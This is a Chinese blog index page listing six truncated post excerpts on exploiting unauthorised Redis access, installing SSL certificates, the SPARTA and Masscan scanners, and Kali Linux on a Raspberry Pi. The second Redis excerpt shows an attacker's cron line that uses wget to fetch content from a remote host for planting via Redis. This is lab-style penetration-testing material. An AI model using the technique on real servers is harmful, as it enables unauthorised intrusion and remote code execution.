- 博客(6)
- 收藏
- 关注
RSS订阅原创 未授权访问的Redis服务02
Redis服务器在初始情况下,并未配置有crontabs相关的计划任务,可在/var/spool/cron/crontabs目录下查看到无文件。也可以进入编辑模式,发现并无计划任务,生成的root文件中还未做任何配置。crontab -e 攻击方任意创建文件,vi 1.txt编写命令***** wget -q -O - http://*/%E5%BE%A...
2018-09-21 09:14:57
207
原创 未授权访问的Redis服务01
在服务器上开启Redis服务wget http://download.redis.io/redis-stable.tar.gz解压tar -xvf redis-stable.tar.gz 进入文件夹,编译make编译完成之后,修改redis.conf 中的daemonize从no改为yes,允许后台运行,并修改服务监听的地址为服务器IP。进入src文件夹,使用...
2018-09-20 22:01:00
239
原创 给自己的网站上传SSL证书——letsencrypt证书与TrustAsia DV SSL CA证书
letsencrypt证书一开始我的网站是安装了WDCP面板的WordPress的个人博客,直接登录进入服务器后台的WDCP面板,找到我之前用这个面板创建的站点列表,最开始的SSL处显示为“否”,为未启用SSL的状态。点击“SSL”一栏即可修改SSL的状态,可以选择不启用、启用、强制启用。刚开始,因为此前均没有启用过SSL证书,因此点击“创建lets证书并启用”,然后WDCP面...
2018-08-07 15:51:27
3220
原创 渗透测试工具SPARTA
SPARTA是一个基于Python脚本的图形化应用程序,在扫描和枚举阶段,辅助渗透测试人员简化网络架构的渗透测试工作。Masscan适合大范围的外部网络的初始扫描,SPARTA提供后续的精准扫描。安装:git clone https://github.com/secforce/sparta.git /opt/spartaapt-get install python-elixirapt-get ...
2018-05-05 23:48:08
1637
原创 扫描工具Masscan
据说这是最快速的互联网端口扫描工具,能够在6分钟扫描整个互联网。安装:git clone https://github.com/robertdavidgraham/masscan.git /opt/masscancd /opt/masscanmakemake install运行:cd /opt/masscan/bin./masscan -p80,8000-8100 10.0.0.0/8-p80,8...
2018-05-05 23:03:52
1333
原创 树莓派3B的初次配置Kail Linux
先使用SD Card Formatter格式化TF卡(其实感觉直接 Windows的格式化也行,还待测试),接着将从https://www.offensive-security.com/kali-linux-arm-images/下载来RaspberryPi版本的镜像文件kali-linux-2018.2-rpi3-nexmon.img.xz解压出来kali-linux-2018.2-rpi3-n...
2018-05-05 22:43:08
3080
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人